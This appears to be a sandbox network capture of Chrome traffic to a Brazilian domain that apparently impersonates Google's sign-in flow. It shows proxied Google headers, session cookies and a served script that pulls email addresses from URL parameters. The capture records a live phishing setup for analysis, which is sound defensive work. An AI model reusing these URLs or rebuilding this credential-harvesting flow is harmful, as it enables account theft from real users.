                                                      2025-01-10 08:27:34 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:34 UTC63INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      2025-01-10 08:27:34 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:34 UTC34INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 62 69 6e 61 72 79 0d 0a
                                                      Data Ascii: Content-Type: application/binary
                                                      2025-01-10 08:27:34 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 75 6e 73 61 66 65 2d 6e 6f 6e 65 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: unsafe-none
                                                      2025-01-10 08:27:34 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:34 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 33 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:34 GMT
                                                      2025-01-10 08:27:34 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:34 UTC200INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 49 6e 74 65 72 61 63 74 69 76 65 4c 6f 67 69 6e 3f 66 6c 6f 77 45 6e 74 72 79 3d 53 65 72 76 69 63 65 4c 6f 67 69 6e 26 66 6c 6f 77 4e 61 6d 65 3d 47 6c 69 66 57 65 62 53 69 67 6e 49 6e 26 68 6c 3d 65 6e 26 69 66 6b 76 3d 41 65 5a 4c 50 39 39 33 2d 52 78 51 6c 79 56 58 48 6c 55 62 4b 74 64 6a 63 45 64 31 4b 48 41 67 72 55 63 6b 33 70 47 6b 74 65 4b 56 45 41 42 76 33 64 4e 30 66 54 49 41 63 61 4f 5a 38 79 59 38 52 6c 2d 55 74 4d 64 64 4b 43 73 47 73 77 0d 0a
                                                      Data Ascii: Location: https://ijgbload.koaladrinks.com.br/InteractiveLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AeZLP993-RxQlyVXHlUbKtdjcEd1KHAgrUck3pGkteKVEABv3dN0fTIAcaOZ8yY8Rl-UtMddKCsGsw


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.949740139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:35 UTC1307OUTGET /InteractiveLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AeZLP993-RxQlyVXHlUbKtdjcEd1KHAgrUck3pGkteKVEABv3dN0fTIAcaOZ8yY8Rl-UtMddKCsGsw HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:36 UTC32INHTTP/1.1 302 Moved Temporarily
                                                      2025-01-10 08:27:36 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:36 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:36 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:36 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:27:36 UTC82INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                      2025-01-10 08:27:36 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 33 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:36 GMT
                                                      2025-01-10 08:27:36 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:36 UTC243INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 76 33 2f 73 69 67 6e 69 6e 2f 69 64 65 6e 74 69 66 69 65 72 3f 66 6c 6f 77 45 6e 74 72 79 3d 53 65 72 76 69 63 65 4c 6f 67 69 6e 26 66 6c 6f 77 4e 61 6d 65 3d 47 6c 69 66 57 65 62 53 69 67 6e 49 6e 26 68 6c 3d 65 6e 26 69 66 6b 76 3d 41 56 64 6b 79 44 6c 47 68 6e 49 74 72 6f 4c 41 43 33 73 69 5f 6d 71 55 4c 51 4f 74 34 4a 73 44 51 57 38 46 42 6e 69 62 78 39 72 41 6d 79 63 32 51 67 64 70 56 67 44 4e 6c 55 2d 51 70 70 68 43 56 43 67 65 7a 78 4f 61 56 4d 78 5a 26 64 73 68 3d 53 31 38 34 37 37 36 30 35 38 30 25 33 41 31 37 33 36 34 39 37 36 35 36 32 34 39 30 36 31 26 64 64 6d 3d 31 0d 0a
                                                      Data Ascii: Location: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1
                                                      2025-01-10 08:27:36 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                      Data Ascii: Pragma: no-cache
                                                      2025-01-10 08:27:36 UTC134INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 72 65 70 6f 72 74 2d 74 6f 2f 67 73 65 5f 71 65 62 68 6c 6b 22 7d 5d 7d 0d 0a
                                                      Data Ascii: Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.949741139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:37 UTC1350OUTGET /v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1 HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:39 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:39 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:39 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:39 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:39 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:39 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=utf-8
                                                      2025-01-10 08:27:39 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:39 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:39 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:38 GMT
                                                      2025-01-10 08:27:39 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:39 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.949742139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:40 UTC1131OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHib1bm8jnmMUUG53bjMxb43esJQQ/m=_b,_tp HTTP/1.1
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:42 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:42 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:42 UTC12INData Raw: 41 67 65 3a 20 38 39 36 36 32 0d 0a
                                                      Data Ascii: Age: 89662
                                                      2025-01-10 08:27:42 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:42 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:42 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:42 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:42 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:42 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:42 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 37 3a 33 33 3a 31 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 07:33:19 GMT
                                                      2025-01-10 08:27:42 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 37 3a 33 33 3a 31 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 07:33:19 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.949744139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:42 UTC1113OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202/c9748d5c3ac951761ec94a41d03d3d9654c2f89666a929be7fcddaf1832a3cbc.js HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:42 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:42 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:42 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:42 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                      Data Ascii: Content-Type: application/javascript
                                                      2025-01-10 08:27:42 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:42 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:42 UTC5INData Raw: 61 65 62 0d 0a
                                                      Data Ascii: aeb
                                                      2025-01-10 08:27:42 UTC2795INData Raw: 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 45 6d 61 69 6c 49 6e 55 52 4c 28 29 20 7b 0a 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 52 4c 27 73 20 73 65 61 72 63 68 20 70 61 72 61 6d 65 74 65 72 73 0a 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 61 6c 6c 50 61 72 61 6d 73 20 3d 20 41 72 72 61 79 2e 66 72 6f 6d 28 75 72 6c 50 61 72 61 6d 73 2e 76 61 6c 75 65 73 28 29 29 3b 0a 20 20 20 20 0a 20 20 20 20 2f 2f 20 52 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 20 66 6f 72 20 65 6d 61 69 6c 20 76 61 6c 69 64 61 74 69 6f 6e 0a 20 20 20 20 63
                                                      Data Ascii: function checkEmailInURL() { // Get the current URL's search parameters const urlParams = new URLSearchParams(window.location.search); const allParams = Array.from(urlParams.values()); // Regular expression for email validation c
                                                      2025-01-10 08:27:42 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:42 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:27:42 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.949745139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:42 UTC1048OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202.js HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
